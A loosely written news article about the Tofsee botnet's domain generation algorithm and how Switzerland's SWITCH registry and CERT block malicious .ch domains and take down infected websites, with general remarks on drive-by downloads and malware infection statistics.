Internet Viruses are lurking not just on porn sites, but in places you might never expect. Spam Tofsee botnet successfully used in domain generation algorithm. It ultimately generates 50 domain names on each day.

To make it safer to surf, Swiss Government (GovCERT) contacted SWITCH Foundation.  The organization that looks after Switzerland’s Internet access, the Switch Foundation obtained a Tofsee sample. Among the hundreds of samples, it monitors the Swiss webs for malicious code and analyzed that this one stood out because about half of the domains it monitored were Switzerland’s top level domain. The other half domains that are analyzed were getting .biz extensions. All of these websites are appeared to be an algorithmically generated that contain Tofsee botnet. Switch Foundation analyzing the founded malware and its domain generation algorithm(DGA).

SWITCH used its own processes by temporarily suspend the domains. SWITCH explained in a post, “This week the Swiss Governmental Computer Emergency Response Team (GovCERT) informed us about the malware Tofsee using .ch as one of the TLDs in its DGA. Together with GovCERT and RoLR (Registry of Last Resort) we used our planned process and added around 520 names to a list of .ch domain names that cannot be registered while they are actively used by the malware.”

The algorithm and botnet was described in detail in a blog post yesterday by Michael Hausding an IT expert, who belongs to the Computer Emergency Response Team (CERT) at Switch.

“Error: the webpage cannot be displayed”. when surfing on the web you get this type of message that are common. So you check that the address has been typed correctly and try again, but the page still does not come up. That are Annoying, but it might be better some time. There are many reasons why a site may be inaccessible like servers down, updates in progress or connection problems. But for the sake of IT security the site may also have been blocked.

“Some sites have got malicious code hidden in them that can infect a computer. The consequences can be serious: personal data and passwords may be stolen, or the whole system may crash”, Said Michael Hausding an IT expert, “My job is to block infected sites and prevent the spread of malware and other harmful code.” Although invisible to the Internet user, CERT is successfully working for Switzerland against malware.

How malware works on your computer

Methods for distributing malware are legion, “Spreading them through ‘drive-by downloads’ has increased recently. Exploiting a gap in the content management software, hidden code is placed on the website without changing the look or feel of it. When users visit the infected page, the code can install viruses and Trojan horses on their computers. There are actually companies which will create scripts to spread harmful code all over the web for 500 dollars, Michael Hausding explained.

The last time I remember, that we had to take action against a malware using .ch or .li domain names was about 8 years ago. It was Conficker that infected millions of computers worldwide. The malware was generating about 500 .ch and .li domains a day to be potentially used as a command and control server. By then SWITCH joined the conficker working group to prevent the use of domain names by this malware.

“Apart from our work there are the actions of the major Internet service providers, who inform their customers periodically about the current threats”,

“Last year there were a number of DDoS (Distributed Denial of Service) attacks on the Swiss Federal Railways and Post-Finance. When this happens, the web site or server is knocked out by bombarding it with requests.”

Where Malware will be found

Direction to the common belief, porn sites or sites offering pirated music, films, programs and so on but that are not necessarily the most dangerous, according to Michael Hausding. “Malicious code can just as easily be found on the web sites of voluntary associations, sports clubs and small businesses. That site was just using out-of-date software or unsecured passwords.” The owners of these domain names, he emphasized, are not criminals. “They are the unwilling helpers of whoever is controlling the botnet. But then it’s our job to step in.” Cleaning up their act.

How we identified These Suspect Site

Specialized firms and some individuals have identified These suspect sites and told Switch about. “On average we get fifty of these notifications a week.” Once they have confirmed that these pages can really infect a computer, the CERT experts inform the owner or the administrator of that domain. “It’s up to them to remove the malicious code from the site”. “For technical staff, this is a fairly straightforward operation that can be done quickly.” If there is no response within 24 hours, Switch takes down the whole domain. The web page is no longer accessible. “If there is no reaction even to this, we ask the owner to identify him or herself with proof of residence or proof of company registration as the case may be. If no such identification is forthcoming, the domain name itself is scrapped.

” Between February 2011 and July 2012, CERT cleaned up 2,828 Swiss sites. “The owners of domain names usually get back to us in a hurry. Often enough, having a web site down means losing money,” Hausding said

In Switzerland there are Unique Approach That measures taken to fight malware are unique in the world, according to Hausding. “Switzerland is the only country in which there is a clear legal framework.


32% of computers in the world have been infected by malware (viruses, worms and Trojan horses), says the Panda Security company in its last report (April-June 2012).

Switzerland is the country with the least number of computers infected (18.4%). The countries hardest hits are South Korea (57.3%), China (51.9%) and Taiwan (42.9%).